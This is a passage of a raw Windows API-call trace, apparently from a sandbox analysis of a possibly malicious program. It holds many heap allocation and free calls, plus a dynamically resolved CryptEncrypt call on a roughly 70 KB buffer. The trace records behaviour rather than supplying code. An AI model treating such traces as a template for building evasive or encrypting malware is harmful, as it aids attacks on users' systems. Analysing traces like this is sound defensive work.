| out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d4950 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0199.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9fc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0199.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.224] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.224] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x11372, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x11378) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.230] CharLowerBuffW (in: lpsz="byte[70520]", cchLength=0xb | out: lpsz="byte[70520]") returned 0xb [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.232] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.233] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.233] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.233] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.233] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.233] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.234] CryptEncrypt (in: hKey=0xaa57a0, 